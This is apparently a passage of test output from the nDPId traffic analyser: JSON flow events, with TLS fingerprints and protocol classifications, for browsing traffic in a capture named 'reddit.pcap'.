{"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","server_names":"tag.device9.com,www.tag.device9.com,fp.zenaps.com,the.sciencebehindecommerce.com,d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=tag.device9.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"8B:5C:A4:62:70:92:3A:09:C3:72:49:B2:A2:22:32:16:22:87:9D:F3"}} 
+00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1605291688749,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":10966,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605291690384,"flow_last_seen":1605291690520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6642,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":782,"flow_first_seen":1605291687514,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6288,"flow_tot_l4_payload_len":596288,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} +00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1605291690926,"flow_last_seen":1605291691284,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2470,"flow_tot_l4_payload_len":37085,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
+00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291690926,"flow_last_seen":1605291691064,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":200,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
+00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691062,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3816,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605291690992,"flow_last_seen":1605291691029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00617{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605291690992,"flow_last_seen":1605291691029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291687934,"flow_last_seen":1605291688340,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6623,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} -00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":847,"flow_first_seen":1605291684452,"flow_last_seen":1605291698703,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6245,"flow_tot_l4_payload_len":482020,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":114,"flow_first_seen":1605291688843,"flow_last_seen":1605291691232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":69230,"flow_avg_l4_payload_len":607,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291684481,"flow_last_seen":1605291684654,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
-00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688843,"flow_last_seen":1605291689005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
-00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1442,"flow_first_seen":1605291686035,"flow_last_seen":1605291696381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11528,"flow_tot_l4_payload_len":1922359,"flow_avg_l4_payload_len":1333,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
-00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686149,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
-00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
-00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1605291686060,"flow_last_seen":1605291697854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10480,"flow_tot_l4_payload_len":99015,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
-00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4191,"flow_avg_l4_payload_len":246,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":5480,"flow_first_seen":1605291686064,"flow_last_seen":1605291695840,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9432,"flow_tot_l4_payload_len":5723539,"flow_avg_l4_payload_len":1044,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
-00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4547,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
-00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686084,"flow_last_seen":1605291686232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1605291686084,"flow_last_seen":1605291686283,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":9920,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690421,"flow_last_seen":1605291690571,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8079,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
-00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":112,"flow_first_seen":1605291686301,"flow_last_seen":1605291696305,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":40926,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291689408,"flow_last_seen":1605291689979,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":8337,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
-00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291688344,"flow_last_seen":1605291688502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7212,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":118,"flow_first_seen":1605291686996,"flow_last_seen":1605291688354,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":94136,"flow_avg_l4_payload_len":797,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291687800,"flow_last_seen":1605291692129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":8436,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} -00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690405,"flow_last_seen":1605291690626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":9313,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 